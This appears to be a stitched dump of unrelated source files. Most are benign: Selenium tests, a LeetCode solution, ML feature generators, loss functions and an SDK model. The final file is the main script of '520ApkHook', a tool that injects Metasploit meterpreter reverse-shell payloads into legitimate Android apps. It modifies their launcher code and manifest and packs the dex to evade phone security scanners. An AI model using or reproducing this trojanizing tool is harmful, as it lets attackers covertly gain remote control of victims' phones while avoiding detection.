driver.find_element_by_css_selector('#table1 thead tr th:nth-of-type(4)').click()
due_column = driver.find_elements_by_css_selector('#table1 tbody tr td:nth-of-type(4)')
dues = [float(due.text.replace('$','')) for due in due_column]
assert dues == sorted(dues, reverse=True)
def test_sort_text_column_in_ascending_order_with_limited_locators(self):
driver = self.driver
driver.get('http://the-internet.herokuapp.com/tables')
driver.find_element_by_css_selector('#table1 thead tr th:nth-of-type(3)').click()
email_column = driver.find_elements_by_css_selector('#table1 tbody tr td:nth-of-type(3)')
emails = [email.text for email in email_column]
assert emails == sorted(emails)
def test_sort_number_column_in_ascending_order_with_helpful_locators(self):
driver = self.driver
driver.get('http://the-internet.herokuapp.com/tables')
driver.find_element_by_css_selector('#table2 thead .dues').click()
due_column = driver.find_elements_by_css_selector('#table2 tbody .dues')
dues = [float(due.text.replace('$','')) for due in due_column]
assert dues == sorted(dues)
if __name__ == "__main__":
unittest.main()
|
LeetCode/python3/70.py
|
ZintrulCre/LeetCode_Archiver
| 279 |
88091
|
class Solution:
def climbStairs(self, n: int) -> int:
if n == 1 or n == 0:
return 1
prev, curr = 1, 1
for i in range(2, n + 1):
temp = curr
curr += prev
prev = temp
return curr
|
backend/apps/mails/migrations/0001_initial.py
|
KuanWeiLee/froggy-service
| 174 |
88092
|
# Generated by Django 2.1.5 on 2019-01-09 14:01
from django.db import migrations
from django.contrib.postgres.operations import HStoreExtension
class Migration(migrations.Migration):
dependencies = [
]
operations = [
HStoreExtension(),
]
|
deephyper/core/analytics/_analytics.py
|
felixeperez/deephyper
| 185 |
88097
|
<reponame>felixeperez/deephyper
"""Analytics command line interface for DeepHyper.
It can be used with:
.. code-block:: console
$ deephyper-analytics --help
Command line to analysis the outputs produced by DeepHyper.
positional arguments:
{notebook,quickplot,topk}
Kind of analytics.
notebook Generate a notebook with different types of analysis
quickplot Tool to generate a quick 2D plot from file.
topk Print the top-k configurations.
optional arguments:
-h, --help show this help message and exit
"""
import argparse
import sys
from deephyper.core.analytics import _topk, _quick_plot
def create_parser():
"""
:meta private:
"""
parser = argparse.ArgumentParser(description="Command line to analysis the outputs produced by DeepHyper.")
subparsers = parser.add_subparsers(help="Kind of analytics.")
mapping = dict()
modules = [
_quick_plot, # output quick plots
_topk
]
for module in modules:
name, func = module.add_subparser(subparsers)
mapping[name] = func
return parser, mapping
def main():
"""
:meta private:
"""
parser, mapping = create_parser()
args = parser.parse_args()
mapping[sys.argv[1]](**vars(args))
|
WebMirror/management/rss_parser_funcs/feed_parse_extractBinhjamin.py
|
fake-name/ReadableWebProxy
| 193 |
88106
|
<reponame>fake-name/ReadableWebProxy<gh_stars>100-1000
def extractBinhjamin(item):
"""
# Binhjamin
"""
vol, chp, frag, postfix = extractVolChapterFragmentPostfix(item['title'])
if not (vol or chp or frag or postfix):
return False
if ('SRKJ' in item['title'] or 'SRKJ-Sayonara Ryuu' in item['tags']) and (chp or vol):
return buildReleaseMessageWithType(item, '<NAME>', vol, chp, frag=frag, postfix=postfix)
if 'Unborn' in item['title']:
return buildReleaseMessageWithType(item, 'Unborn', vol, chp, frag=frag, postfix=postfix)
if 'Bu ni Mi' in item['title'] or '100 Years Of Martial Arts' in item['title']:
return buildReleaseMessageWithType(item, '100 Years Of Martial Arts', vol, chp, frag=frag, postfix=postfix)
return False
|
testing/scripts/gyp_flag_compare.py
|
jason-simmons/flutter_buildroot
| 2,151 |
88108
|
<reponame>jason-simmons/flutter_buildroot
#!/usr/bin/env python
# Copyright 2015 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
"""Wrap //tools/gn/bin/gyp_flag_compare.py for the bots.
This script wraps the GN test script in the facade needed for the
'ScriptTest' step class of the chromium recipe_module
(see scripts/slave/recipe_modules/chromium/steps.py in the build repo.
The script takes N arguments, for the N targets to compare flags for.
"""
import json
import os
import sys
import common
def main_run(args):
rc = common.run_command([sys.executable,
os.path.join(common.SRC_DIR,
'tools', 'gn', 'bin',
'gyp_flag_compare.py')] + args.args)
# TODO(dpranke): Figure out how to get a list of failures out of
# gyp_flag_compare?
json.dump({
'valid': True,
'failures': ['compare_failed'] if rc else [],
}, args.output)
return rc
def main_compile_targets(args):
# TODO(dpranke): Figure out how to get args.args plumbed through to here.
json.dump([], args.output)
if __name__ == '__main__':
funcs = {
'run': main_run,
'compile_targets': main_compile_targets,
}
sys.exit(common.run_script(sys.argv[1:], funcs))
|
nalaf/features/relations/context.py
|
ashish-narwal/nalaf
| 103 |
88117
|
<filename>nalaf/features/relations/context.py
from nalaf.features.relations import EdgeFeatureGenerator
from nltk.stem import PorterStemmer
class LinearDistanceFeatureGenerator(EdgeFeatureGenerator):
"""
The absolute distance between the two entities in the edge.
If distance is greater than 5 (default), add to feature set.
Also add the actual distance between the two entities.
:param feature_set: the feature set for the dataset
:type feature_set: nalaf.structures.data.FeatureDictionary
:param distance: the number of tokens between the two entities, default 5
:type distance: int
:param training_mode: indicates whether the mode is training or testing
:type training_mode: bool
"""
def __init__(
self, distance=5,
prefix_entity_linear_distance_greater_than=None,
prefix_entity_linear_distance_lesser_than=None,
prefix_entity_linear_distance=None
):
self.distance = distance
self.prefix_entity_linear_distance_greater_than = prefix_entity_linear_distance_greater_than
self.prefix_entity_linear_distance_lesser_than = prefix_entity_linear_distance_lesser_than
self.prefix_entity_linear_distance = prefix_entity_linear_distance
def generate(self, dataset, feature_set, is_training_mode):
for edge in dataset.edges():
entity1_number = edge.entity1.head_token.features['id']
entity2_number = edge.entity2.head_token.features['id']
distance = abs(entity1_number - entity2_number)
if distance > self.distance:
feature_name = self.gen_prefix_feat_name("prefix_entity_linear_distance_greater_than", 5)
self.add_to_feature_set(feature_set, is_training_mode, edge, feature_name)
else:
feature_name = self.gen_prefix_feat_name("prefix_entity_linear_distance_lesser_than", 5)
self.add_to_feature_set(feature_set, is_training_mode, edge, feature_name)
feature_name = self.gen_prefix_feat_name("prefix_entity_linear_distance")
self.add_to_feature_set(feature_set, is_training_mode, edge, feature_name, value=distance)
class EntityOrderFeatureGenerator(EdgeFeatureGenerator):
"""
The is the order of the entities in the sentence. Whether entity1 occurs
first or entity2 occurs first.
:param feature_set: the feature set for the dataset
:type feature_set: nalaf.structures.data.FeatureDictionary
:param training_mode: indicates whether the mode is training or testing
:type training_mode: bool
"""
def __init__(
self,
prefix_order_entity1_entity2,
prefix_order_entity2_entity1,
):
self.prefix_order_entity1_entity2 = prefix_order_entity1_entity2
self.prefix_order_entity2_entity1 = prefix_order_entity2_entity1
def generate(self, dataset, feature_set, is_training_mode):
for edge in dataset.edges():
if edge.entity1.offset < edge.entity2.offset:
feature_name = self.gen_prefix_feat_name("prefix_order_entity1_entity2")
else:
feature_name = self.gen_prefix_feat_name("prefix_order_entity2_entity1")
self.add_to_feature_set(feature_set, is_training_mode, edge, feature_name)
class IntermediateTokensFeatureGenerator(EdgeFeatureGenerator):
"""
Generate the bag of words representation, masked text, stemmed text and
parts of speech tag for each of the tokens present between two entities in
an edge.
"""
def __init__(
self,
prefix_fwd_bow_intermediate=None,
prefix_fwd_bow_intermediate_masked=None,
prefix_fwd_stem_intermediate=None,
prefix_fwd_pos_intermediate=None,
prefix_bkd_bow_intermediate=None,
prefix_bkd_bow_intermediate_masked=None,
prefix_bkd_stem_intermediate=None,
prefix_bkd_pos_intermediate=None,
prefix_bow_intermediate=None,
prefix_bow_intermediate_masked=None,
prefix_stem_intermediate=None,
prefix_pos_intermediate=None,
):
self.stemmer = PorterStemmer()
"""an instance of PorterStemmer"""
self.prefix_fwd_bow_intermediate = prefix_fwd_bow_intermediate
self.prefix_fwd_bow_intermediate_masked = prefix_fwd_bow_intermediate_masked
self.prefix_fwd_stem_intermediate = prefix_fwd_stem_intermediate
self.prefix_fwd_pos_intermediate = prefix_fwd_pos_intermediate
self.prefix_bkd_bow_intermediate = prefix_bkd_bow_intermediate
self.prefix_bkd_bow_intermediate_masked = prefix_bkd_bow_intermediate_masked
self.prefix_bkd_stem_intermediate = prefix_bkd_stem_intermediate
self.prefix_bkd_pos_intermediate = prefix_bkd_pos_intermediate
self.prefix_bow_intermediate = prefix_bow_intermediate
self.prefix_bow_intermediate_masked = prefix_bow_intermediate_masked
self.prefix_stem_intermediate = prefix_stem_intermediate
self.prefix_pos_intermediate = prefix_pos_intermediate
def generate(self, dataset, feature_set, is_training_mode):
for edge in dataset.edges():
sentence = edge.same_part.sentences[edge.same_sentence_id]
if edge.entity1.head_token.features['id'] < edge.entity2.head_token.features['id']:
first = edge.entity1.head_token.features['id']
second = edge.entity2.head_token.features['id']
for i in range(first + 1, second):
token = sentence[i]
feature_name = self.gen_prefix_feat_name('prefix_fwd_bow_intermediate', token.word)
self.add_to_feature_set(feature_set, is_training_mode, edge, feature_name)
feature_name = self.gen_prefix_feat_name('prefix_fwd_bow_intermediate_masked', token.masked_text(edge.same_part))
self.add_to_feature_set(feature_set, is_training_mode, edge, feature_name)
feature_name = self.gen_prefix_feat_name('prefix_fwd_stem_intermediate', self.stemmer.stem(token.word))
self.add_to_feature_set(feature_set, is_training_mode, edge, feature_name)
feature_name = self.gen_prefix_feat_name('prefix_fwd_pos_intermediate', token.features['pos'])
self.add_to_feature_set(feature_set, is_training_mode, edge, feature_name)
else:
first = edge.entity2.head_token.features['id']
second = edge.entity1.head_token.features['id']
for i in range(first + 1, second):
token = sentence[i]
feature_name = self.gen_prefix_feat_name('prefix_bkd_bow_intermediate', token.word)
self.add_to_feature_set(feature_set, is_training_mode, edge, feature_name)
feature_name = self.gen_prefix_feat_name('prefix_bkd_bow_intermediate_masked', token.masked_text(edge.same_part))
self.add_to_feature_set(feature_set, is_training_mode, edge, feature_name)
feature_name = self.gen_prefix_feat_name('prefix_bkd_stem_intermediate', self.stemmer.stem(token.word))
self.add_to_feature_set(feature_set, is_training_mode, edge, feature_name)
feature_name = self.gen_prefix_feat_name('prefix_bkd_pos_intermediate', token.features['pos'])
self.add_to_feature_set(feature_set, is_training_mode, edge, feature_name)
for i in range(first + 1, second):
token = sentence[i]
feature_name = self.gen_prefix_feat_name('prefix_bow_intermediate', token.word)
self.add_to_feature_set(feature_set, is_training_mode, edge, feature_name)
feature_name = self.gen_prefix_feat_name('prefix_bow_intermediate_masked', token.masked_text(edge.same_part))
self.add_to_feature_set(feature_set, is_training_mode, edge, feature_name)
feature_name = self.gen_prefix_feat_name('prefix_stem_intermediate', self.stemmer.stem(token.word))
self.add_to_feature_set(feature_set, is_training_mode, edge, feature_name)
feature_name = self.gen_prefix_feat_name('prefix_pos_intermediate', token.features['pos'])
self.add_to_feature_set(feature_set, is_training_mode, edge, feature_name)
|
modules/until_module.py
|
Fork-for-Modify/UniVL
| 161 |
88121
|
# coding=utf-8
# Copyright 2018 The Google AI Language Team Authors and The HugginFace Inc. team.
# Copyright (c) 2018, <NAME>PORATION. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""PyTorch BERT model."""
import logging
import numpy as np
import torch
from torch import nn
import torch.nn.functional as F
import math
from modules.until_config import PretrainedConfig
logger = logging.getLogger(__name__)
def gelu(x):
"""Implementation of the gelu activation function.
For information: OpenAI GPT's gelu is slightly different (and gives slightly different results):
0.5 * x * (1 + torch.tanh(math.sqrt(2 / math.pi) * (x + 0.044715 * torch.pow(x, 3))))
"""
return x * 0.5 * (1.0 + torch.erf(x / math.sqrt(2.0)))
def swish(x):
return x * torch.sigmoid(x)
ACT2FN = {"gelu": gelu, "relu": torch.nn.functional.relu, "swish": swish}
class LayerNorm(nn.Module):
def __init__(self, hidden_size, eps=1e-12):
"""Construct a layernorm module in the TF style (epsilon inside the square root).
"""
super(LayerNorm, self).__init__()
self.weight = nn.Parameter(torch.ones(hidden_size))
self.bias = nn.Parameter(torch.zeros(hidden_size))
self.variance_epsilon = eps
def forward(self, x):
u = x.mean(-1, keepdim=True)
s = (x - u).pow(2).mean(-1, keepdim=True)
x = (x - u) / torch.sqrt(s + self.variance_epsilon)
return self.weight * x + self.bias
class PreTrainedModel(nn.Module):
""" An abstract class to handle weights initialization and
a simple interface for dowloading and loading pretrained models.
"""
def __init__(self, config, *inputs, **kwargs):
super(PreTrainedModel, self).__init__()
if not isinstance(config, PretrainedConfig):
raise ValueError(
"Parameter config in `{}(config)` should be an instance of class `PretrainedConfig`. "
"To create a model from a Google pretrained model use "
"`model = {}.from_pretrained(PRETRAINED_MODEL_NAME)`".format(
self.__class__.__name__, self.__class__.__name__
))
self.config = config
def init_weights(self, module):
""" Initialize the weights.
"""
if isinstance(module, (nn.Linear, nn.Embedding)):
# Slightly different from the TF version which uses truncated_normal for initialization
# cf https://github.com/pytorch/pytorch/pull/5617
module.weight.data.normal_(mean=0.0, std=self.config.initializer_range)
elif isinstance(module, LayerNorm):
if 'beta' in dir(module) and 'gamma' in dir(module):
module.beta.data.zero_()
module.gamma.data.fill_(1.0)
else:
module.bias.data.zero_()
module.weight.data.fill_(1.0)
if isinstance(module, nn.Linear) and module.bias is not None:
module.bias.data.zero_()
def resize_token_embeddings(self, new_num_tokens=None):
raise NotImplementedError
@classmethod
def init_preweight(cls, model, state_dict, prefix=None, task_config=None):
old_keys = []
new_keys = []
for key in state_dict.keys():
new_key = None
if 'gamma' in key:
new_key = key.replace('gamma', 'weight')
if 'beta' in key:
new_key = key.replace('beta', 'bias')
if new_key:
old_keys.append(key)
new_keys.append(new_key)
for old_key, new_key in zip(old_keys, new_keys):
state_dict[new_key] = state_dict.pop(old_key)
if prefix is not None:
old_keys = []
new_keys = []
for key in state_dict.keys():
old_keys.append(key)
new_keys.append(prefix + key)
for old_key, new_key in zip(old_keys, new_keys):
state_dict[new_key] = state_dict.pop(old_key)
missing_keys = []
unexpected_keys = []
error_msgs = []
# copy state_dict so _load_from_state_dict can modify it
metadata = getattr(state_dict, '_metadata', None)
state_dict = state_dict.copy()
if metadata is not None:
state_dict._metadata = metadata
def load(module, prefix=''):
local_metadata = {} if metadata is None else metadata.get(prefix[:-1], {})
module._load_from_state_dict(
state_dict, prefix, local_metadata, True, missing_keys, unexpected_keys, error_msgs)
for name, child in module._modules.items():
if child is not None:
load(child, prefix + name + '.')
load(model, prefix='')
if prefix is None and (task_config is None or task_config.local_rank == 0):
logger.info("-" * 20)
if len(missing_keys) > 0:
logger.info("Weights of {} not initialized from pretrained model: {}"
.format(model.__class__.__name__, "\n " + "\n ".join(missing_keys)))
if len(unexpected_keys) > 0:
logger.info("Weights from pretrained model not used in {}: {}"
.format(model.__class__.__name__, "\n " + "\n ".join(unexpected_keys)))
if len(error_msgs) > 0:
logger.error("Weights from pretrained model cause errors in {}: {}"
.format(model.__class__.__name__, "\n " + "\n ".join(error_msgs)))
return model
@property
def dtype(self):
"""
:obj:`torch.dtype`: The dtype of the module (assuming that all the module parameters have the same dtype).
"""
try:
return next(self.parameters()).dtype
except StopIteration:
# For nn.DataParallel compatibility in PyTorch 1.5
def find_tensor_attributes(module: nn.Module):
tuples = [(k, v) for k, v in module.__dict__.items() if torch.is_tensor(v)]
return tuples
gen = self._named_members(get_members_fn=find_tensor_attributes)
first_tuple = next(gen)
return first_tuple[1].dtype
@classmethod
def from_pretrained(cls, config, state_dict=None, *inputs, **kwargs):
"""
Instantiate a PreTrainedModel from a pre-trained model file or a pytorch state dict.
Download and cache the pre-trained model file if needed.
"""
# Instantiate model.
model = cls(config, *inputs, **kwargs)
if state_dict is None:
return model
model = cls.init_preweight(model, state_dict)
return model
##################################
###### LOSS FUNCTION #############
##################################
class CrossEn(nn.Module):
def __init__(self,):
super(CrossEn, self).__init__()
def forward(self, sim_matrix):
logpt = F.log_softmax(sim_matrix, dim=-1)
logpt = torch.diag(logpt)
nce_loss = -logpt
sim_loss = nce_loss.mean()
return sim_loss
class MILNCELoss(nn.Module):
def __init__(self, batch_size=1, n_pair=1,):
super(MILNCELoss, self).__init__()
self.batch_size = batch_size
self.n_pair = n_pair
torch_v = float(".".join(torch.__version__.split(".")[:2]))
self.bool_dtype = torch.bool if torch_v >= 1.3 else torch.uint8
def forward(self, sim_matrix):
mm_mask = np.eye(self.batch_size)
mm_mask = np.kron(mm_mask, np.ones((self.n_pair, self.n_pair)))
mm_mask = torch.tensor(mm_mask).float().to(sim_matrix.device)
from_text_matrix = sim_matrix + mm_mask * -1e12
from_video_matrix = sim_matrix.transpose(1, 0)
new_sim_matrix = torch.cat([from_video_matrix, from_text_matrix], dim=-1)
logpt = F.log_softmax(new_sim_matrix, dim=-1)
mm_mask_logpt = torch.cat([mm_mask, torch.zeros_like(mm_mask)], dim=-1)
masked_logpt = logpt + (torch.ones_like(mm_mask_logpt) - mm_mask_logpt) * -1e12
new_logpt = -torch.logsumexp(masked_logpt, dim=-1)
logpt_choice = torch.zeros_like(new_logpt)
mark_ind = torch.arange(self.batch_size).to(sim_matrix.device) * self.n_pair + (self.n_pair//2)
logpt_choice[mark_ind] = 1
sim_loss = new_logpt.masked_select(logpt_choice.to(dtype=self.bool_dtype)).mean()
return sim_loss
class MaxMarginRankingLoss(nn.Module):
def __init__(self,
margin=1.0,
negative_weighting=False,
batch_size=1,
n_pair=1,
hard_negative_rate=0.5,
):
super(MaxMarginRankingLoss, self).__init__()
self.margin = margin
self.n_pair = n_pair
self.batch_size = batch_size
easy_negative_rate = 1 - hard_negative_rate
self.easy_negative_rate = easy_negative_rate
self.negative_weighting = negative_weighting
if n_pair > 1 and batch_size > 1:
alpha = easy_negative_rate / ((batch_size - 1) * (1 - easy_negative_rate))
mm_mask = (1 - alpha) * np.eye(self.batch_size) + alpha
mm_mask = np.kron(mm_mask, np.ones((n_pair, n_pair)))
mm_mask = torch.tensor(mm_mask) * (batch_size * (1 - easy_negative_rate))
self.mm_mask = mm_mask.float()
def forward(self, x):
d = torch.diag(x)
max_margin = F.relu(self.margin + x - d.view(-1, 1)) + \
F.relu(self.margin + x - d.view(1, -1))
if self.negative_weighting and self.n_pair > 1 and self.batch_size > 1:
max_margin = max_margin * self.mm_mask.to(max_margin.device)
return max_margin.mean()
|
alipay/aop/api/domain/KoubeiMarketingCampaignOpenDeliveryDeleteModel.py
|
snowxmas/alipay-sdk-python-all
| 213 |
88138
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
import json
from alipay.aop.api.constant.ParamConstants import *
class KoubeiMarketingCampaignOpenDeliveryDeleteModel(object):
def __init__(self):
self._delivery_type = None
self._partner_id = None
self._shop_id = None
@property
def delivery_type(self):
return self._delivery_type
@delivery_type.setter
def delivery_type(self, value):
self._delivery_type = value
@property
def partner_id(self):
return self._partner_id
@partner_id.setter
def partner_id(self, value):
self._partner_id = value
@property
def shop_id(self):
return self._shop_id
@shop_id.setter
def shop_id(self, value):
self._shop_id = value
def to_alipay_dict(self):
params = dict()
if self.delivery_type:
if hasattr(self.delivery_type, 'to_alipay_dict'):
params['delivery_type'] = self.delivery_type.to_alipay_dict()
else:
params['delivery_type'] = self.delivery_type
if self.partner_id:
if hasattr(self.partner_id, 'to_alipay_dict'):
params['partner_id'] = self.partner_id.to_alipay_dict()
else:
params['partner_id'] = self.partner_id
if self.shop_id:
if hasattr(self.shop_id, 'to_alipay_dict'):
params['shop_id'] = self.shop_id.to_alipay_dict()
else:
params['shop_id'] = self.shop_id
return params
@staticmethod
def from_alipay_dict(d):
if not d:
return None
o = KoubeiMarketingCampaignOpenDeliveryDeleteModel()
if 'delivery_type' in d:
o.delivery_type = d['delivery_type']
if 'partner_id' in d:
o.partner_id = d['partner_id']
if 'shop_id' in d:
o.shop_id = d['shop_id']
return o
|
dropbox_problem/problem_8.py
|
loftwah/Daily-Coding-Problem
| 129 |
88157
|
"""This problem was asked by Dropbox.
Given a list of words, determine whether the words can be chained to form a circle.
A word X can be placed in front of another word Y in a circle if the last character
of X is same as the first character of Y.
For example, the words ['chair', 'height', 'racket', touch', 'tunic'] can form the
following circle: chair --> racket --> touch --> height --> tunic --> chair."""
|
main.py
|
wisdark/520apkhook
| 390 |
88184
|
#!/usr/bin/python3
# -*- coding: utf-8 -*-
import os
import re
import sys
import time
import argparse
import subprocess
try:
import rich, Crypto
except ModuleNotFoundError as e:
print('\n[!] 遇到致命错误!')
print('\n[!] 模块rich, pycryptodome未安装, 请在终端中执行命令`pip3 install rich pycryptodome`进行安装.\n')
print('[!] 程序已结束!\n\n\tGood Bay !\n')
exit()
from utils.config import OPTIONS
from utils.ZipApkFile import ZipApkFile
from utils.CreateMsfDex import CreateMsfDex
from utils.JarCommand import JarCommand
from utils.EncryptFile import EncryptFile
from utils.InjectMsf2App import InjectMsf2App
from utils.CustomPrint import CustomPrint
from utils.CopyJniFile import CopyTree
from argparse import RawTextHelpFormatter
from shutil import copyfile, rmtree
LOGO = r'''
______ ___ ____ ___ __ __ __ __
/ ____/|__ \ / __ \ / | ____ / /__ / / / /____ ____ / /__
/___ \ __/ // / / // /| | / __ \ / //_// /_/ // __ \ / __ \ / //_/
____/ / / __// /_/ // ___ | / /_/ // ,< / __ // /_/ // /_/ // ,<
/_____/ /____/\____//_/ |_|/ .___//_/|_|/_/ /_/ \____/ \____//_/|_|
/_/
'''
def GetArguments():
parser = argparse.ArgumentParser(description=f'520ApkHook Apk注入工具 v1.1', formatter_class=RawTextHelpFormatter)
parser._optionals.title = f"参数说明"
required_arguments = parser.add_argument_group(f'Required Arguments')
required_arguments.add_argument("--lhost", dest="lhost", help="msf的IP地址", required=True)
required_arguments.add_argument("--lport", dest="lport", help="msf的端口", required=True)
required_arguments.add_argument("-m", "--mode", dest="mode", default="1", help=r'''App注入模式
1 注入Msf并且对新生成的App进行dex加固, 可以绕过手机管家检测. (默认)
2 仅注入Msf模式, 当模式1不可用时进行尝试, 此模式生成的App成功率高, 但是手机管家可以检测到
3 仅加固模式, 用来测试加固是否影响App运行.
当模式2和模式3单独运行生成App都无法使用时, 此App将不能进行利用.
''')
required_arguments.add_argument("-p", "--payload", dest="payload", default="android/meterpreter/reverse_tcp", help=r'''msf的Payload类型
Payload1 android/meterpreter/reverse_tcp (默认)
Payload2 android/meterpreter/reverse_http
Payload3 android/meterpreter/reverse_https
''')
required_arguments.add_argument("-n", "--normal-apk", dest="normalapk", help="进行注入的apk文件", required=True)
return parser.parse_args()
def ReslovePath(*args):
return os.path.abspath(os.path.join(*args))
def AddSleep():
time.sleep(0)
def ExitScript():
print('')
Print.PrintSuccess('程序已结束! Good Bay !')
exit()
def MyExceptHook(exctype, value, traceback):
if exctype == KeyboardInterrupt:
Print.PrintError(f'你已主动退出程序...')
ExitScript()
else:
sys.__excepthook__(exctype, value, traceback)
def CheckEnv():
AddSleep()
CheckJavaVersion()
def CheckJavaVersion():
(out, err)= subprocess.Popen(f'{JavaCommand} -version', stdout=subprocess.PIPE, shell=True, stderr=subprocess.STDOUT).communicate()
if sys.platform == 'win32':
out = out.decode('gbk')
else:
out = out.decode('utf-8')
if 'version' not in out:
Print.PrintError(f'系统中未安装java环境,或者配置了错误的java路径`{JavaCommand}`,请修改`utils/config.py`文件中JavaPath对应值...')
ExitScript()
def MkDir(**kwargs):
if os.path.exists(kwargs['TestDir']):
rmtree(kwargs['TestDir'])
for _ in kwargs['MakeDirs']:
os.mkdir(_)
AddSleep()
def MkTestDir():
Print.PrintInfo(f'创建临时文件目录...')
MakeDirs = [TestDir, TestDirApkFile, TestDirDexFile, TestDirUnZipApkPath, TestDirAppUnSmaliPath, TestDirMsfUnSmaliPath, TestDirUnZipXmlPath]
Print.PrintStatus(
f'正在创建临时文件夹...',
MkDir,
TestDir=TestDir,
MakeDirs=MakeDirs
)
Print.PrintDirTree(TestDir, 4)
Print.PrintSuccess(f'临时文件目录创建成功!')
def UnzipApk(apkpath):
Print.PrintInfo(f'解压需要注入App...')
apk = ZipApkFile(apkpath, 'r', OPTIONS)
Print.PrintStatus(
f'正在解压{apkpath}...',
apk.UnZipApk,
)
Print.PrintDirTree(TestDirApkFile, 3)
Print.PrintSuccess(f'注入App`{apkpath}`解压成功!')
def CreateMsf():
Print.PrintInfo(f'构建msf dex文件, 创建Msf handler.rc...')
msf = CreateMsfDex(MsfPayload, MsfLHost, MsfLPort, OPTIONS)
CreateMsfHandler()
Print.PrintStatus(
f'开始构建msf dex文件, 创建Msf handler.rc...',
msf.Generate
)
Print.PrintDirTree(TestDirDexFile, 3)
Print.PrintSuccess(f'msf dex文件构建成功! 保存在`{MsfBuildDexFile}`')
Print.PrintSuccess(f'Msf handler.rc构建成功! 保存在`{MsfHandler}`')
def CopyUnZipApkFile():
Print.PrintInfo(f'复制Apk解压的dex文件...')
for _ in os.listdir(TestDirUnZipApkPath):
AppDexFile = ReslovePath(TestDirUnZipApkPath, _)
if AppDexFile.endswith('.dex') :
copyfile(AppDexFile, ReslovePath(TestDirAppUnSmaliPath, _))
Print.PrintStatus(
f'正在复制Apk解压的dex文件...',
AddSleep
)
Print.PrintDirTree(TestDirDexFile, 3)
Print.PrintSuccess(f'App解压的dex文件复制成功!\n')
def DecodeAndroidManifest():
Print.PrintInfo(f'准备解码App的AndroidManifest.xml文件...')
DecodeAndroidManifestPath = ReslovePath(TestDirUnZipXmlPath, 'AndroidManifest_Decode.xml')
AndroidManifestPath = ReslovePath(TestDirUnZipApkPath, 'AndroidManifest.xml')
Jar = JarCommand(OPTIONS)
Print.PrintStatus(
f'解码App的{AndroidManifestPath}中...',
Jar.Xml2Axml,
androidmanifestfile=AndroidManifestPath,
androidmanifestdecodefile=DecodeAndroidManifestPath
)
Print.PrintDirTree(TestDirUnZipXmlPath, 3)
Print.PrintSuccess(f'解码AndroidManifest.xml文件成功,保存在`{DecodeAndroidManifestPath}`')
def BakSmaliDexFile():
Print.PrintInfo(f'准备反编译msf的dex文件...')
Jar = JarCommand(OPTIONS)
MsfSmaliPath = ReslovePath(TestDirMsfUnSmaliPath, 'classes')
Print.PrintStatus(
f'正在反编译msf的dex文件...',
Jar.Dex2Smail,
dexfilepath=MsfBuildDexFile,
smalidirpath=MsfSmaliPath
)
Print.PrintDirTree(TestDirDexFile, 3)
Print.PrintSuccess(f'反编译msf的dex文件成功,保存在`{TestDirMsfUnSmaliPath}`')
Print.PrintInfo(f'准备反编译App的dex文件...')
for _ in os.listdir(TestDirUnZipApkPath):
AppDexFile = ReslovePath(TestDirUnZipApkPath, _)
AppSmaliPath = os.path.splitext(ReslovePath(TestDirAppUnSmaliPath, _))[0]
if AppDexFile.endswith('.dex') :
Print.PrintStatus(
f'正在反编译App的{_}文件...',
Jar.Dex2Smail,
dexfilepath=AppDexFile,
smalidirpath=AppSmaliPath
)
Print.PrintDirTree(TestDirDexFile, 3)
Print.PrintSuccess(f'反编译App的dex文件成功,保存在`{TestDirAppUnSmaliPath}`')
def InjectMsf2Apk():
Print.PrintInfo(f'准备将msf的smali文件注入到App中...')
Inject = InjectMsf2App(OPTIONS)
DecodeAndroidManifestPath = ReslovePath(TestDirUnZipXmlPath, 'AndroidManifest_Decode.xml')
InjectMsfSmaliPath = ReslovePath(TestDirMsfUnSmaliPath, 'classes')
AppLauncherActivity, MoveAppLauncherActivityClassPath, InjectAppLauncherActivitSmaliPath = Inject.GetInjectAppLauncherActivitFile(appdexpath=TestDirAppUnSmaliPath, androidmanifestfile=DecodeAndroidManifestPath)
VARS = Inject.RandomMsfSmali(msfsmalipath=InjectMsfSmaliPath)
i = 0
while True:
ChangeCode = Inject.InjectMsf2SmaliFile(vars=VARS, injectapplauncheractivitsmalipath=InjectAppLauncherActivitSmaliPath)
if ChangeCode == False and i == 0:
Print.PrintError(f'不能在`{InjectAppLauncherActivitSmaliPath}`中找到App默认启动组件`.method public onCreate()V`, 无法将Msf注入App! 请分析此文件逻辑,找到默认启动组件所在的smali文件. 请参考`https://github.com/cleverbao/520apkhook/issues/1`.')
Print.PrintInfo(f'是否找到App默认启动组件? 输入`n/N`退出程序.\n')
SmaliPath = Print.PrintInput(f'Input').strip()
print()
i += 1
elif ChangeCode == False and i > 0:
SmaliPath = Print.PrintInput(f'Input').strip()
else:
if i > 0:
Print.PrintSuccess(f'你已输入正确的smali文件`{InjectAppLauncherActivitSmaliPath}`, 程序继续...')
break
if SmaliPath == 'n' or SmaliPath == 'N':
Print.PrintError(f'你已选择退出程序...')
ExitScript()
if os.path.exists(SmaliPath) :
InjectAppLauncherActivitSmaliPath = SmaliPath
else:
Print.PrintError(f'输入的文件不存在, 请重试...')
Inject.CopyMsfSmali2AppSmali(vars=VARS, msfsmalipath=InjectMsfSmaliPath, moveapplauncheractivityclasspath=MoveAppLauncherActivityClassPath)
Print.PrintStatus(
f'正在将msf的smali文件注入到App中...',
Inject.AddSleep
)
Print.PrintLogo(f'\n修改代码: {ChangeCode}')
Print.PrintSuccess(f'成功将msf的smali文件注入到App中,主要修改`{InjectAppLauncherActivitSmaliPath}`文件.')
def EditorAndroidManifest():
Print.PrintInfo(f'准备注入msf权限和壳信息到AndroidManifest.xml中...')
Inject = InjectMsf2App(OPTIONS)
DecodeAndroidManifestPath = ReslovePath(TestDirUnZipXmlPath, 'AndroidManifest_Decode.xml')
InjectMsfSmaliPath = ReslovePath(TestDirMsfUnSmaliPath, 'classes')
AppLauncherActivity = Inject.GetInjectAppLauncherActivit(androidmanifestfile=DecodeAndroidManifestPath)
Jar = JarCommand(OPTIONS)
AndroidManifestPath = ReslovePath(TestDirUnZipApkPath, 'AndroidManifest.xml')
NewAndroidManifestPath = ReslovePath(TestDirUnZipXmlPath, 'NewAndroidManifest.xml')
